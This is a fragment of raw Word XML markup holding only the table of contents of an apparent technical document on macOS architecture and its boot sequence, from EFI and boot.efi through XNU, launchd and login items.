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84306151" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-2097080431"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="007467D0" w:rsidRDefault="007467D0">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="007467D0">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc445313205" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Architecture overview</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313205 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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06" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Architecture Overview</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313206 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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07" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mac Kernel Architecture</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313207 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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08" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OSX API function call</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313208 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</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09" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mac boot</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313209 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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10" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.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210 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BIOS</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313211 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EFI</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313212 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</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13" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The early boot process</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313213 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EFI</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313214 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BootROM(FirmWire)</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313215 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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6" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bootcaches.plist</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313216 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</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7" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>boot.efi</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313217 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</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8" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>boot_args</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313218 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</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19" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.6.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XNU</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313219 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</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0" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.7.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Launchd</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313220 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.8.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Login Item</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313221 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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22" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mac boot config environment</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313222 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
